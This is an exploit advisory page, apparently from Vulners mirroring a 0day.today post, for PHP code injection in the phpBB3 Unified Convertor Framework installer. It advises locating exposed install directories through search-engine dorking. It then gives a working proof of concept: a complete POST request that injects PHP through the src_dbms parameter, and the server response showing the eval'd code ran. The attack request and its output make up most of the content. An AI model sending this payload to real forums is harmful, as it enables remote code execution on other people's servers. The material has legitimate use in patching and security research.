Vulners
Lucene search
phpBB3 Unified Convertor Framework PHP Code Injection
#Title: phpBB3 Unified Convertor Framework PHP Code Injection
#Date: 12.12.13
#Contact: [email protected]
---------------------------------------------------------------
PhpBB3 Unified Convertor Framework suffers from a PHP Code Injection
in installation path. By default it should be disabled but you can
find open installation path's by dorking it or seeking for dir's.
Example:
path/index.php?language=pl&mode=convert&sub=settings&tag=phpbb20
www.phpbb-forum.com/install/index.php?language=pl&mode=convert&sub=settings&tag=phpbb20
POST Data:
forum_path=../forums&refresh=1&src_dbhost=mysql.phpbb-forum.com&src_dbms=[PHP Injection]&src_dbname=db_name&
src_dbpasswd=random&src_dbport=3306&src_dbuser=random&src_table_prefix_phpbb_&submit=Start
---------------------------------------------------------------
PoC:
Request:
POST /2/index.php?language=pl&mode=convert&sub=settings&tag=phpbb20 HTTP/1.1
Host: www.black-hawk.pl
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: phpbb3_mhrwf_u=1; phpbb3_mhrwf_k=; phpbb3_mhrwf_sid=55ca2a95fa6df59c4e401181be06f96f; __utma=25232750.891580291.1386842589.1386842589.1386842589.1; __utmb=25232750; __utmc=25232750; __utmz=25232750.1386842589.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); style_cookie=null; BE=7e4c6af4bfbb176d43a3e0b3150e66d8e9f8308cba84c1f736838085d05766cb3e943a96552aef7756f57c115fd640f99f54cd581ff1b4ab83b32f8773484f88538108245
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
forum_path=..%2fforums&refresh=1&src_dbhost=mysql.cba.pl&src_dbms=${@print(666)}\&src_dbname=black_hawk_pl&src_dbpasswd=random&src_dbport=3306&src_dbuser=black_hawk&src_table_prefix_phpbb_&submit=Rozpocznij%20konwersj%c4%99
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 Dec 2013 10:48:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.17
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Content-Length: 8741
<br />
<b>Warning</b>: Unexpected character in input: ''' (ASCII=39) state=1 in <b>/virtual/black-hawk.pl/2/index.php(752) : eval()'d code</b> on line <b>1</b><br />
<br />
<b>Warning</b>: Unexpected character in input: '\' (ASCII=92) state=1 in <b>/virtual/black-hawk.pl/2/index.php(752) : eval()'d code</b> on line <b>1</b><br />
<br />
<b>Warning</b>: Unexpected character in input: ''' (ASCII=39) state=1 in <b>/virtual/black-hawk.pl/2/index.php(752) : eval()'d code</b> on line <b>1</b><br />
666<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="pl" xml:lang="pl">
<head>
(...)
...as you can see it works - 666 got printed.
# 0day.today [2018-01-02] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Dec 2013 00:00Current
7.6High risk
Vulners AI Score7.6